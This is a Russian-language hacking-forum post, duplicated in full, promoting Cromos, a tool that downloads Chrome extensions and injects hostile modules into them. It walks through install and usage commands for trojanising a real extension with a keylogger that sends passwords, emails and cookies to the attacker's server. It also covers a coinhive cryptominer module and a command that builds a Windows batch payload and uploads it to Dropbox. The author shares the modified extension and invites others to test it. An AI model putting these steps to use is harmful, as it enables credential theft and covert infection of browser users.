Vander
11.11.2017, 22:31
И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.
https://forum.antichat.xyz/attachments/4788437/img_36e93965bb.png
Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.
Функционал:
· Загрузка расширения
· Инъекция кода
· Загрузка файлов в Dropbox
· Заражение ОС семейства Windows
Установка:
> git clone https://github.com/fbctf/cromos
> cd /cromos
> pip install –r requirements.txt
> python setup.py
https://forum.antichat.xyz/attachments/4788437/img_72643ac47b.png
Справка:
> ./cromos.py –h
https://forum.antichat.xyz/attachments/4788437/img_900e581034.png
Использование:
· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Я использовал QR code scanner.
https://forum.antichat.xyz/attachments/4788437/img_8536b0e57e.png
· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
https://forum.antichat.xyz/attachments/4788437/img_cd207953fb.png
Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.
Модифицированное расширение, можно найти здесь:
https://forum.antichat.xyz/attachments/4788437/img_fcd07f4b16.png
Создание пакетного файла и загрузка его в Dropbox:
> python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Модули:
· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.
· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.
Небольшой ролик, по использованию инструмента от разработчиков:
> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1
На этом можно завершить. Спасибо за уделенное внимание.
https://forum.antichat.xyz/attachments/4788437/img_36e93965bb.png
Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.
Функционал:
· Загрузка расширения
· Инъекция кода
· Загрузка файлов в Dropbox
· Заражение ОС семейства Windows
Установка:
> git clone https://github.com/fbctf/cromos
> cd /cromos
> pip install –r requirements.txt
> python setup.py
https://forum.antichat.xyz/attachments/4788437/img_72643ac47b.png
Справка:
> ./cromos.py –h
https://forum.antichat.xyz/attachments/4788437/img_900e581034.png
Использование:
· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Я использовал QR code scanner.
https://forum.antichat.xyz/attachments/4788437/img_8536b0e57e.png
· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger
https://forum.antichat.xyz/attachments/4788437/img_cd207953fb.png
Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.
Модифицированное расширение, можно найти здесь:
https://forum.antichat.xyz/attachments/4788437/img_fcd07f4b16.png
Создание пакетного файла и загрузка его в Dropbox:
> python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Модули:
· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.
· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.
Небольшой ролик, по использованию инструмента от разработчиков:
> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1
На этом можно завершить. Спасибо за уделенное внимание.